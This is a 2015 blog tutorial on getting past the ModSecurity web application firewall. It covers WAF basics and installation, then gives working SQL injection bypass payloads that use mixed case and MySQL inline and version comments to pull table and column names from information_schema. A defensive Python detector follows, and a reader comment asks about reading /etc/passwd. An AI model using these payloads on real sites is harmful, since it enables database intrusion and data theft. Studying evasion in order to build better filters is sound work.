Saturday, 25 July 2015

How to Bypass Mod Security WAF | Rahul Tyagi

Introduction to Web Application Firewall and IDS and IPS
Web Application Firewall: When a website owner deploys an application containing a database of all kinds of attack signatures, which filters the requests made by visitors, then the application deployed on the website is called a web application firewall.

Types of WAF
Software WAF: These are firewall technologies that, just like a software application, can be installed on the web server and used to filter the requested contents.

Linux   : Mod Security : Free | Paid : .php
Windows : Dot Defender : Paid        : .asp .aspx

Mod Security: Mod Security came into the picture in early 2008, when hackers were at their peak and defacing websites all over the world. This was an era when there were many paid firewalls, but there was no solution for mid-level organizations.

Mod Security came and gave some hope to website owners that it would protect their websites from hackers, but it had two drawbacks:

1. The attack database was limited.
2. It was open source but lacked funding.

With the OWASP Top 10 attacks, they made an open call to hackers and built a large database of the available attacks on web applications.

How to Install Mod Security on Ubuntu
$ sudo apt-get install libapache2-mod-security
$ sudo a2enmod mod-security
$ sudo /etc/init.d/apache2 force-reload

Understanding the working of WAF
Every WAF works on two basic principles: white-list and black-list filtration.

Black List: This is the second way of securing the website. It keeps a database of all the known attack strings, especially string-based ones such as (order by), (union all select), etc. Any request from a VISITOR carrying this kind of string is checked against the blacklist, and the response is blocked if it matches any string in the list.

How to Configure Your Mod Security in Ubuntu After Installation
sudo gedit /etc/apache2/sites-available/000-default.conf

After opening this file, i.e. 000-default.conf, we have to change the IP address of the server or the website name whose traffic we want to filter through Mod Security.

Bypassing WAF Validations and Filtration

1. Upper Lower Case Method

union all select --> UnIoN aLl SeLeCt
' UnIoN SeLeCt 1,2--+&Submit=Submit#

Inline Comments : /*     */

2. Inline Executable Comments

Step 1: Get the tables from the database
' /*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/ 1,2--+&Submit=Submit#

Target Table is users

Step 2: Get the columns
' /*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/ 1,column_name from information_schema.columns where table_name='users'--+&Submit=Submit#

Version-Based Inline Executable Comments (MySQL runs the comment body only when its server version is at least the number that follows the !):
5.00.00 --> 50000
4.00.00 --> 40000
3.00.00 --> 30000
2.00.00 --> 20000
1.00.00 --> 10000

/*!50000UnIoN*/ + /*!50000aLl*/+/*!50000SeLeCt*/

Step 3:
' /*!50000UnIoN*/+/*!50000aLl*/+/*!50000SeLeCt*/ 1,column_name from information_schema.columns where table_name='users'--+&Submit=Submit#

Note: Do the same thing with all the query words and proceed with the attack.
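To show why the black-list filtration described earlier misses the case and inline-comment variants in this section, here is an added Python example (it is not the post's code and not ModSecurity's rule engine): a naive case-sensitive substring rule placed beside a detector that canonicalizes the parameter before matching. The sample requests are constructed from the payloads already shown on this page, plus one benign request.

```python
import re

# Constructed samples built from the payloads shown on the page, plus one
# benign request, used to exercise both detectors.
SAMPLES = {
    "plain":   "' UNION ALL SELECT 1,2--+",
    "case":    "' UnIoN aLl SeLeCt 1,2--+",
    "comment": "' /*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/ 1,2--+",
    "version": "' /*!50000UnIoN*/+/*!50000aLl*/+/*!50000SeLeCt*/ "
               "1,column_name from information_schema.columns--+",
    "benign":  "id=42&Submit=Submit",
}

# A weak rule: literal signatures, matched case-sensitively on the raw value.
NAIVE_SIGNATURES = ["union all select", "UNION ALL SELECT"]


def naive_blacklist(value: str) -> bool:
    """Raw substring match; misses mixed case and comment-split keywords."""
    return any(sig in value for sig in NAIVE_SIGNATURES)


def normalize(value: str) -> str:
    """Canonicalize a request parameter the way the database will read it."""
    s = value.lower()
    # MySQL executable comments /*!...*/ and /*!50000...*/: the body is
    # executed, so keep it and drop only the comment markers and version.
    s = re.sub(r"/\*!\d{0,5}(.*?)\*/", r" \1 ", s, flags=re.S)
    # Ordinary /* ... */ comments are ignored by the database; drop them.
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    # '+' is a URL-encoded space; collapse every whitespace run to one space.
    s = re.sub(r"[\s+]+", " ", s)
    return s.strip()


UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b")


def normalized_blacklist(value: str) -> bool:
    """Signature match on the canonical form; catches all page variants."""
    return UNION_SELECT.search(normalize(value)) is not None


def compare() -> dict:
    """Return {sample name: (naive verdict, normalized verdict)}."""
    return {name: (naive_blacklist(v), normalized_blacklist(v))
            for name, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, (naive, norm) in compare().items():
        print(f"{name:8s} naive={naive!s:5s} normalized={norm}")
```

ModSecurity's own rule language expresses the same idea with transformation functions such as t:lowercase and t:removeComments applied to the input before the rule operator runs.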


Unknown said...

what about php code? such as php info or /etc/passwd